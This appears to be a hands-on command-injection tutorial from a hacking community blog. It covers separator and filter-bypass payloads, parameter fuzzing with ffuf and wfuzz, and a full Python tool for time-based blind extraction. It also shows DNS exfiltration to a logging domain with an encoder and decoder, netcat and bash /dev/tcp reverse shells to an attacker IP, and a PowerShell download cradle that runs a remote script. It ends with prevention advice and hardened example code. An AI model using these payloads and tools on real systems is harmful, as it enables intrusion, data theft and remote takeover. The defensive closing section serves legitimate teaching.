Command Injection is a critical vulnerability that allows an attacker to execute arbitrary system commands on a server hosting an application. If an application improperly handles user input and passes it to the operating system, an attacker can escape the intended function and execute system commands with the same privileges as the application.

Depending on where your input is being injected you may need to terminate the quoted context (using " or ') before the commands.


🛠️ How Command Injection Works (Skip if You Know the Basics)

Applications that call system functions (e.g., shell commands) without sanitizing user input are vulnerable.

Example: Vulnerable Code (PHP)

<?php
  $user = $_GET['user'];          // attacker-controlled, never validated
  system("ping -c 4 " . $user);   // concatenated straight into a shell command line
?>

💡 Problem: The script appends user input to the command string without validation, so the shell interprets every metacharacter in $user. 💣 Attack: Append ;cat /etc/passwd and the shell runs the ping, then the second command:

http://target.com/ping.php?user=127.0.0.1;cat /etc/passwd

✅ Result: The contents of /etc/passwd (Linux user accounts) are displayed after the ping output.

🚀 Exploiting Command Injection: Practical Examples

📌 Universal Separators (Work in Unix shells and Windows cmd.exe; swap ls / id for dir / whoami on Windows)

ls||id; ls ||id; ls|| id; ls || id  # Run the second command only if the first fails (useful when the first part is guaranteed to error)
ls|id; ls |id; ls| id; ls | id      # Pipe: both run, the first command's output is fed to the second, so only id's output is shown
ls&&id; ls &&id; ls&& id; ls && id  # Run the second command only if the first succeeds
ls&id; ls &id; ls& id; ls & id      # Unix: ls is sent to the background, so its output may be missing from the response; cmd.exe: runs both in order
ls %0A id                           # URL-encoded newline, decoded by the server before it reaches the shell, acts as a separator (RECOMMENDED, rarely filtered)

📌 Unix-Specific Payloads

`ls`                          # Command substitution: the output of ls replaces the backticks, useful when the injection point is inside an argument
$(ls)                         # Same with $( ), nests more cleanly than backticks
ls; id                        # Chain commands with a semicolon
ls${LS_COLORS:10:1}${IFS}id   # Filter bypass: with the default LS_COLORS, ${LS_COLORS:10:1} expands to ";" and ${IFS} to a space, giving "ls; id" without typing either character

📌 Windows-Specific Bypasses

powershell C:**2\n??e*d.*?          # Executes notepad: PowerShell resolves the wildcard pattern to C:\Windows\System32\notepad.exe, so the word "notepad" never appears in the request
@^p^o^w^e^r^shell c:**32\c*?c.e?e   # Executes calc: cmd.exe strips the ^ escape characters (a filter never sees "powershell") and the wildcards resolve to calc.exe

🔄 Bypassing Input Filters & Restrictions

Breaking Out of Quoted Context

Sometimes the application wraps your input in double quotes (" ") or single quotes (' '), for example ping -c 4 "INPUT". Close the quote, inject the command, then reopen the same kind of quote so the application's own closing quote stays balanced; an unterminated quote makes the shell reject the whole line and nothing runs.

🔹 If input is in double quotes (" ")

test" && whoami && echo "

🔹 If input is in single quotes (' ')

test' && whoami && echo '

🔹 Backslash-escaped metacharacters (double evaluation)

\$\(whoami\)

The shell strips the backslashes on the first pass and is left with the literal text $(whoami), so this runs nothing on its own. It executes only when the application feeds the result through a shell a second time (another sh -c, eval, ssh), which makes it a bypass for filters that look for the unescaped sequence $( in such double-evaluation setups.

πŸ” Finding Vulnerable Parameters

Many applications accept user input through query parameters. Here are the top 25 parameters that could be vulnerable to Command Injection or Remote Code Execution (RCE):

?cmd={payload}
?exec={payload}
?command={payload}
?execute={payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

🛠 Automate Testing for These Parameters: save the names above as params.txt and fuzz the parameter name with a harmless marker command such as id, then fuzz a payload list (payloads.txt) into any parameter whose response changes:

ffuf -u "http://target.com/page?FUZZ=id" -w params.txt
wfuzz -c -z file,params.txt --hc 404 "http://target.com/page?FUZZ=id"
wfuzz -c -z file,payloads.txt --hc 404 "http://target.com/page?input=FUZZ"
ffuf -u "http://target.com/page?input=FUZZ" -w payloads.txt

💣 Advanced Command Injection Techniques

⏳ Time-Based Data Exfiltration

When the command's output is not reflected in the response, extract it character by character: make the injected command sleep only when a guess about one character is right, and read the answer from the response time.

time if [ "$(whoami | cut -c 1)" = "s" ]; then sleep 5; fi   # "time" is only for trying the check locally; when injecting, drop it and time the HTTP response instead

⏱️ If the response takes 5+ seconds, the first letter is 's'. Step cut -c through positions 2, 3, ... and through the candidate characters to recover the full username. Use a single = (POSIX) rather than ==, which only bash's [ accepts, and quote the substitution so an empty result does not break the test.
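The loop described above, automated against a local stand-in for the vulnerable endpoint. This is an added example and not part of the original post: the target is a constructed Python function that concatenates input into a /bin/sh command exactly like ping.php does, the value being stolen is a made-up SECRET environment variable in place of whoami output, and the sleep is shortened to 0.3 seconds so the run finishes quickly. The extractor sees nothing but how long each request took.

```python
import string
import subprocess
import time

# Constructed stand-in for the vulnerable endpoint (not a real target). Like the
# page's ping.php, it concatenates user input into a command string for /bin/sh,
# so a payload beginning with ";" runs as a second command. The value to steal is
# the made-up SECRET environment variable; on a real target it would be the output
# of whoami or the contents of a file.
SECRET = "s3cret"
SLEEP_SECONDS = 0.3             # delay the payload adds when a guess is right
THRESHOLD = SLEEP_SECONDS / 2   # a request slower than this counts as a hit


def simulated_target(user_input: str) -> float:
    """Run the vulnerable command and return the elapsed time, like an HTTP response timer."""
    start = time.monotonic()
    subprocess.run(
        "echo pinging " + user_input,           # the injection sink
        shell=True,
        env={"PATH": "/usr/local/bin:/usr/bin:/bin", "SECRET": SECRET},
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    return time.monotonic() - start


def probe_payload(position: int, candidate: str) -> str:
    """Payload that sleeps only if character <position> (1-indexed) of the secret equals <candidate>."""
    # printf %s avoids the trailing newline echo would add; a single = is the POSIX string test.
    return (f'; if [ "$(printf %s "$SECRET" | cut -c {position})" = "{candidate}" ];'
            f' then sleep {SLEEP_SECONDS}; fi')


def extract_secret(timer, alphabet: str = string.ascii_lowercase + string.digits,
                   max_len: int = 32) -> str:
    """Recover a string one character at a time using nothing but response timing.

    timer(payload) must return the response time of one injected request.
    Stops when no candidate makes the request slow: either the end of the
    string was reached, or the character is outside the alphabet.
    """
    recovered = ""
    for position in range(1, max_len + 1):
        for candidate in alphabet:
            if timer(probe_payload(position, candidate)) > THRESHOLD:
                recovered += candidate
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    print("recovered:", extract_secret(simulated_target))
```

Against a real target, `timer` is the function that sends one HTTP request with the payload URL-encoded into the vulnerable parameter and returns the measured response time; everything else stays the same. Widen `alphabet` (or add uppercase and punctuation) when the value can contain more than lowercase letters and digits, and keep the threshold at roughly half the sleep so normal latency jitter is not mistaken for a hit.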

📡 DNS-Based Data Exfiltration

1️⃣ Use an online DNS logging service (such as dnsbin.zhack.ca) that records every lookup under a subdomain it hands you.
2️⃣ Make the target encode the data into hostnames under that subdomain and resolve them; the names show up in the service's log:

for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done   # one lookup per entry in /, the entry name becomes the first label

📌 This works even when HTTP and other egress are blocked, because most networks allow outbound DNS, but the lookups are still visible in DNS server logs. The data also has to fit DNS: each label is at most 63 characters, and only letters, digits and hyphens are safe in a label, so hex- or base32-encode anything else (file contents, names with spaces) before sending it.
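The page's loop leaks raw directory names, which only works while every name happens to be a valid DNS label. The added example below, which is not from the original post, shows the general form of the technique: bytes are hex-encoded, cut into 31-byte chunks (62 hex characters, within the 63-character label limit), numbered so the receiver can reorder and de-duplicate them, and reassembled from the query log on the attacker's side. The zone under d.zhack.ca reuses the page's placeholder token; nothing is resolved, the functions only build and parse names. The on-target one-liner assumes xxd is installed there.

```python
import binascii
from typing import Dict, List

# Attacker-controlled zone, reusing the placeholder token from the page's example.
# Nothing is resolved by this code; it only builds and parses names.
EXFIL_ZONE = "3a43c7e4e57a8d0e2057.d.zhack.ca"
MAX_LABEL = 63        # RFC 1035: a label is at most 63 octets
MAX_NAME = 253        # and a name in text form is at most 253 characters
CHUNK_BYTES = 31      # 31 bytes -> 62 hex characters, one label per query (matches xxd -p -c 31)


def encode_queries(data: bytes, zone: str = EXFIL_ZONE) -> List[str]:
    """Model of what the target emits: one name <seq>.<hex>.<zone> per 31-byte chunk.

    Hex keeps every label inside [0-9a-f], valid in any label and unaffected by
    resolvers that lowercase names; the sequence number lets the receiver reorder
    queries and drop resolver retries.
    """
    queries = []
    for seq, start in enumerate(range(0, len(data), CHUNK_BYTES)):
        label = binascii.hexlify(data[start:start + CHUNK_BYTES]).decode("ascii")
        name = f"{seq}.{label}.{zone}"
        if len(name) > MAX_NAME:
            raise ValueError(f"name too long ({len(name)} chars); use a shorter zone")
        queries.append(name)
    return queries


def target_command(path: str, zone: str = EXFIL_ZONE) -> str:
    """Shell one-liner to inject on a Unix target (assumes xxd is installed there);
    it produces exactly the names encode_queries() would build for the file."""
    return f'n=0; for c in $(xxd -p -c {CHUNK_BYTES} {path}); do host "$n.$c.{zone}"; n=$((n+1)); done'


def decode_queries(observed: List[str], zone: str = EXFIL_ZONE) -> bytes:
    """Rebuild the file from the names in the DNS log, in any order, duplicates included."""
    suffix = "." + zone.lower()
    parts: Dict[int, str] = {}
    for name in observed:
        name = name.rstrip(".").lower()          # logs may show a trailing dot or mixed case
        if not name.endswith(suffix):
            continue                             # unrelated lookup
        labels = name[: -len(suffix)].split(".")
        if len(labels) != 2 or not labels[0].isdigit():
            continue                             # not one of ours
        parts[int(labels[0])] = labels[1]
    return binascii.unhexlify("".join(parts[seq] for seq in sorted(parts)))


if __name__ == "__main__":
    # Constructed sample standing in for a file read on the target.
    sample = b"root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n"
    names = encode_queries(sample)
    print(target_command("/etc/passwd"))
    print(*names, sep="\n")
    print(decode_queries(names[::-1] + names[:1]) == sample)
```

Hex halves the payload density compared with base32, but it needs no special handling of padding or case and is trivial to produce with xxd on the target; one query carries 31 bytes, so a 2 KB file costs about 70 lookups. The decoder deliberately ignores anything that is not a two-label name with a numeric prefix under the zone, so noise from the logging service's other traffic does not corrupt the result.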

🔥 Exploiting Command Injection for Remote Shell Access

Linux Reverse Shell

Netcat Reverse Shell

1️⃣ Start a listener on your machine:

nc -lvnp 4444

2️⃣ Inject the payload on the vulnerable target. Spaces must be URL-encoded, and -e needs a netcat build that supports it (netcat-traditional or ncat; the OpenBSD nc shipped by many distributions does not):

http://target.com/page?input=nc%20-e%20/bin/sh%20YOUR_IP%204444

Bash Reverse Shell

The payload is bash -i >& /dev/tcp/YOUR_IP/4444 0>&1. Both > and & must be URL-encoded; an unencoded & ends the query parameter before the shell ever sees the rest:

http://target.com/page?input=bash%20-i%20%3E%26%20/dev/tcp/YOUR_IP/4444%200%3E%261

The redirection is set up by the shell that runs the injected command, so if that shell is dash (/bin/sh on Debian and Ubuntu) /dev/tcp does not exist and the payload fails. Wrap it so bash performs the redirection: bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1' (URL-encoded the same way).

Windows Reverse Shell

PowerShell Reverse Shell

Host your reverse-shell script as shell.ps1 on a web server at YOUR_IP and inject a download cradle that fetches and runs it in memory:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_IP/shell.ps1')"

How to Prevent Command Injection

✅ Avoid the shell entirely → Never concatenate user input into a command string. Call the program with an argument vector (execve-style APIs, PHP proc_open() with an array command, Python subprocess with a list) so the input can only ever be a single argument, never part of the command line.
✅ Validate input against an allow-list → For the ping example, accept only an IP address or a strictly defined hostname, and reject anything beginning with "-" so the input cannot become an option either.
✅ Escape only as a last resort → If a shell string is unavoidable, wrap each argument with escapeshellarg() in PHP. escapeshellcmd() on the whole string stops command chaining but still lets an attacker add arbitrary arguments.
✅ Restrict system commands → Applications should not execute arbitrary OS commands; where a library call exists for the task (DNS lookups, file operations), use it instead of shelling out.
✅ Use a Web Application Firewall (WAF) → Detects and blocks common payloads, but only as defense in depth: the filter bypasses above show how routinely such filtering fails.
✅ Run applications with least privilege → Never run the web application as root/Administrator; the injected command inherits every privilege the application has.
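The first three points side by side with the page's vulnerable pattern, as an added example that is not the post's own code. It is written in Python rather than PHP so it runs anywhere: PHP's system() corresponds to subprocess.run(..., shell=True), and the fix is the argument-vector form (proc_open() with an array command in PHP, a list in Python) plus an allow-list. echo stands in for ping so no network is needed, which means the example demonstrates command chaining but not ping's own behaviour; the hostname pattern and the function names are this example's choices.

```python
import ipaddress
import re
import subprocess

# "echo" stands in for "ping" so the example runs without network access; the
# shell parsing that makes the first version exploitable is unchanged.
PING = ["echo", "ping", "-c", "4"]
# A label of letters, digits and hyphens that starts alphanumerically, joined by dots.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9-]{0,62}(?:\.[A-Za-z0-9][A-Za-z0-9-]{0,62})*")


def ping_vulnerable(user: str) -> str:
    """The page's pattern, system("ping -c 4 " . $user): input becomes part of a shell command line."""
    cmd = " ".join(PING) + " " + user
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def ping_argv_only(user: str) -> str:
    """Argument vector, no shell: metacharacters are inert, but an input beginning
    with "-" would still reach the real program as an option (argument injection)."""
    return subprocess.run(PING + [user], capture_output=True, text=True).stdout


def validate_host(user: str) -> str:
    """Allow-list: an IP literal or a plain hostname. Anything else, including
    anything starting with "-", is rejected before a process is spawned."""
    try:
        return str(ipaddress.ip_address(user))
    except ValueError:
        pass
    if len(user) <= 253 and HOSTNAME_RE.fullmatch(user):
        return user
    raise ValueError(f"invalid host: {user!r}")


def ping_hardened(user: str) -> str:
    """Validate, then exec with an argv list: the input can only ever be the host argument."""
    return subprocess.run(PING + [validate_host(user)], capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "127.0.0.1; echo INJECTED"
    print("vulnerable:", repr(ping_vulnerable(payload)))   # the second command ran
    print("argv only: ", repr(ping_argv_only(payload)))    # one literal argument, nothing ran
    try:
        ping_hardened(payload)
    except ValueError as e:
        print("hardened:  ", e)                           # rejected before any process starts
```

Run it and the vulnerable variant prints INJECTED on its own line, the argv-only variant prints the whole payload as one harmless string, and the hardened variant refuses the input. The allow-list is what closes the remaining gap in the argv-only version: with the real ping, a "host" such as -f would otherwise be accepted as a flag, which is the same class of problem escapeshellcmd() leaves open.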

🎉 Join the VeryLazyTech community today and level up your skills! 🎉
